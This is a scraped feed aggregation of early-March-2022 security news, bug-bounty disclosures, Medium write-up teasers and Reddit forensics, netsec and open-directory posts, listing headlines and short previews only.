    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how bluetooth is a vulnerability to the data that's being transferred over the connection but does it pose an actual threat to, lets say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05 [link] [comments]
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in the Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians through reserving Airbnb's? submitted by /u/intentropy [link] [comments]
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey Everyone. Moderating this Subreddit throughout the past 6 or so months I have seen the topic come up quite a bit regarding utilization. While Metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that often cause issues with this requirement (IE Training on common security topics/trends/New Threat Landscapes) As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them push out. I'd be interested to hear others and their thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme [link] [comments]
    Dealing with impostor syndrome?
    Leaving it kinda brief, I have around 6 years in Security starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM. Scoping out deployments, talking to clients about what to log and understanding their requirements and how to change/modify their environments to match our services offerings etc. Anyway I took a "Security Architect" role at a big 5 firm and definitely realized I'm under prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience, I just feeling way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack [link] [comments]
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist [link] [comments]
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on workstations development team members use? We’ve pulled local admin rights from general employees years ago without much issue but every time we approach our dev teams to do it it’s just impossible as it too extremely inhibits their work as they legitimately need to do config management for locally installed services (eg IIS) and maybe less legitimately installing “development tools”. I’d add, we do have pro, qa, dev, sandbox environments but the devs still choose to do development on their desktop systems for “performance” reasons which there is some truth to as we give them beefy hardware (tons of ram/top end CPUs). Edit: after some good dialog here seems like common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this so chime in with any other thoughts/experience. submitted by /u/clayjk [link] [comments]
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What if anything should organisations be doing to protect themselves? submitted by /u/annonuk2020 [link] [comments]
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    Exposing the Trickbot Malware Gang - An OSINT Analysis
    Based on yet another recently leaked batch of the Trickbot malware gang's internal communication channels, I've decided to come up with a proper OSINT analysis on the topic and actually enrich the original information data set, including elaborating further and providing actionable intelligence on the online whereabouts of the Trickbot malware gang's Internet-connected
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne: an efficient forensic investigation system for watering-hole attacks by ourren; GoDLP: a sensitive-information protection system by ourren; Make JDBC Attacks Brilliant Again, bonus chapter by ourren; Attack Flow — Beyond Atomic Behaviors by ourren; For more recent articles, visit SecWiki
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    Data URI(data:) XSS v2
    A long time ago I wrote a post on Data URI XSS called “XSS filtering bypass technique using form action + data:”, and today I'd like to write a somewhat improved version of it. This is Data URI XSS v2. The PortSwigger XSS cheatsheet, and most other cheatsheets, don't really cover data:. For XSS via the embed tag, only javascript:alert() is listed. Is that really all there is? Of course not 🤩 1 Data URI To build more Data URI bypass patterns, we should first learn a bit more about Data URIs, right?
  • Open

    steps to run before analyzing the iphone image
    steps to run before forensic analysis: turn off screenlock, turn off backup, turn off find my iphone, what else? submitted by /u/cyberfo [link] [comments]
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. Currently enrolled in Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714 [link] [comments]
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat [link] [comments]
    Interesting
    submitted by /u/kramps_ [link] [comments]
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB SOLUTIONS
    WebSocket is a bidirectional protocol for transferring data between client and server, widely used in modern web applications and, like HTTP,… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB SOLUTIONS
    Clickjacking occurs when the target user clicks a malicious link hosted by an attacker within a web application, resulting in various… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB SOLUTIONS
    CORS (Cross-Origin Resource Sharing) is a mechanism that provides controlled access to resources outside a given domain… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    FreeBuf Weekly | Up to 1TB of Nvidia data stolen; Toyota halts production after a supplier suffers a cyberattack
    A roundup of this week's hot news, quality articles and handy tools, so you don't miss any of the week's highlights!
    Avast releases a free decryptor for HermeticRansom, which struck Ukraine
    Avast recently released a free decryption tool for the HermeticRansom ransomware, to help Ukrainian victims of the extortion campaign recover their data.
    On a simple penetration test
    A summary of a simple penetration test
    Cyberspace Administration of China releases the draft Provisions on the Administration of Internet Pop-up Information Push Services (for public comment)
    The Provisions state explicitly that providers of operating systems, terminal devices, application software, websites and similar services within China must comply with them when offering Internet pop-up information push services.

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest i9-12900K CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and Cellebrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDs, and M.2 SSDs. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before)? I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi, how can I investigate an executed malicious file like a maldoc or any executable? How do I get the list of artifacts? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted file? if yes, do we need to root the iphone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    The Truth About USB Device Serial Numbers – (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic report says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT challenge
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks — Hunting for CVEs, Photos and Gas Station Tank Controllers.
    Any cybersecurity enthusiast knows the Shodan search engine, but would you know how to use the right parameters to “dork… Continue reading on Medium »
    A cybersecurity and cyber-intelligence enthusiast with many things to tell you.
    Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPLORE HIDDEN FILES) Continue reading on Medium »
  • Open

    Hacken's Role in Ukraine's Cyber Defense: The Latest AMA with Dyma Budorin
    The Hacken team recently held its first AMA session with our CEO Dyma Budorin since the start of Russia's invasion of Ukraine… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    A Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ https://simpsons.porn/assets/images/ http://edmazur.com/images/funny/ http://fricking.ninja/Media/photo_comments/mp4/ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

    [Security Bulletin] Spring Cloud Gateway remote code execution vulnerability risk notice...
    Spring recently published a CVE report for Spring Cloud Gateway that includes a remote code execution vulnerability (CVE-2022-22947). An attacker can use this vulnerability to maliciously create...
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE but no idea why I keep getting a red message in Chrome when I try to go to websites I normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background processes. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shuts down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can affect me in any way, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
    I mean if the website forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and had 127.0.0.1 suspiciousaddress. I checked the address on web scanners and they said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didn't write it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget . Need recommendations regarding easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    From cognitive warfare in cyberspace to large-scale crippling cyberattacks against Russia by ourren; Analysis of the China Mobile GS3101 optical modem: a bait-and-switch by ourren; Learning Java security with 三梦: semi-automated vulnerability hunting by ourren; TA402 continues attacks against Middle East targets by Avenger; For more recent articles, visit SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | Open-source PJSIP library affected by critical vulnerabilities; MIIT publishes rules restricting app download behaviour
    Against the backdrop of the escalating Russia-Ukraine conflict, the US Senate unanimously passed the Strengthening American Cybersecurity Act.
    How to prevent phishing emails? S/MIME email security certificates offer a solution!
    Phishing (so named for its similarity in sound to fishing, also called a phishing attack) sends deceptive emails to victims while impersonating banks or other well-known institutions, luring recipients into providing sensitive information (such as usernames, passwords, ATM PINs or
    Rising risk! Data leaks and shadow assets expand the enterprise attack surface
    Data leaks and shadow assets are the largest sources of cyberattacks facing large organizations worldwide.
    Gamers beware! Hackers are spreading malware that can hijack social media accounts
    It mainly spreads through Microsoft's app store in the form of trojanized PC game applications.
    Russia considers cyberattacks on its satellites an act of war, but not its invasion of Ukraine
    A hacker group affiliated with Anonymous announced it had shut down the control center of Russia's space agency.
    Cyberwar becomes the “fifth battlefield”: these figures show the state of Ukraine's network
    Russian President Putin announced a special military operation in the Donbas region of eastern Ukraine. Beyond the hot war on the ground, the “cyberwar” between Russia and Ukraine had in fact long since begun.
    MITRE releases Adversary Engagement framework V1 and a series of implementation guidance documents
    Adversary engagement guidance for active defenders
    CIS 2021 Conference Spring Edition begins offline recording, gathering in spring to talk security
    On the morning of March 2, the two-day CIS 2021 Cybersecurity Innovation Conference Spring Edition began offline recording at the Shanghai Baohua Marriott Hotel.
    New tactics! A new trend in gambling platform payment channels: virtual currency becomes the “new favorite”
    Virtual currency has become the “darling” of deposit and withdrawal channels on gambling platforms; third-party top-up methods such as WeChat and Alipay, which once dominated, are gradually disappearing from some gambling platforms.
    HTTP and HTTPS: six common questions
    Some people have questions about HTTP and HTTPS, so the editor has collected several common ones and answered them, hoping to help you understand HTTP and HTTPS more deeply.
    APT29 uses the pandemic as a lure to attack embassy-related personnel
    Recently, APT29 has again shifted targets, turning its attention from SolarWinds to embassies.
    New variant of the modular banking trojan IcedID surfaces
    IcedID is a modular banking trojan first disclosed in 2017 and one of the most prevalent malware families of recent years.
    In depth | Data sharing in the financial industry is complex; how to strengthen the foundations of data security?
    Data classification and grading can effectively promote the secure sharing of financial data between institutions and within the industry, and helps unlock and realize the value of financial industry data.

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today I'm going to explain how I found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is John the Ripper (JTR)? How to use JTR?
    What is John the Ripper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically for Django apps, so I decided to hack a random project on GitHub. And I found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Are data practitioners the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers is quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the belkasoft software trial run to view the pagefile on my PC, the categories that the data is broken up into are fairly understandable: browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
I recently disclosed an unauthenticated RCE to a company that provides virtual network appliances. The process was going well and they patched the vulnerability, but upon my request for patch release notes they ghosted me. I already have CVE numbers assigned but would like to have MITRE publish them, but don't know what to do if the company is not being cooperative. Anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
Hi, I'm working for a company which is ISO 27001:2013 certified and I was asked to do a GAP analysis on the ISO 27001:2021 standard. So if there are any useful articles or any references, please share them. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
Hey all, wondering what your thoughts are on Kaspersky as an AV tool, and as a company given recent events. Do you think that, with all the independent reviewers, they could still be compromised by, say, the KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
Closed-loop management practice for partner data security by ourren. For more of the latest articles, visit SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
One fine day I was scrolling through tweets and my eyes caught a tweet in which Dan Conn posted an OSINT challenge on Oct 5, 2021, mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

FreeBuf Morning Report | Ukrainian researcher leaks Conti ransomware source code; Apple disables core iPhone features in Russia
Apple says that after Russia's attack on Ukraine it has stopped selling its products in Russia and restricted Apple Pay functionality.
Quickly locate cryptomining trojans!
One of the most distinctive characteristics of a cryptomining trojan is very high CPU usage; checking CPU usage with the top command shows that the process xmr is consuming a lot of CPU.
What is an SDK, and how does it threaten our privacy?
As of now, 107 apps have not yet completed rectification, including Ymatou (洋码头) and Offcn Education (中公教育).
  • Open

    Exposing the Conti Ransomware Gang - An OSINT Analysis
UPDATE: The following set of graphics aims to visualize the recently leaked Conti ransomware gang members' conversations. UPDATE: The following is a complete list of all the Bitcoin addresses used by the Conti ransomware gang members obtained using public

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidentally wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, etc. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and it's not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
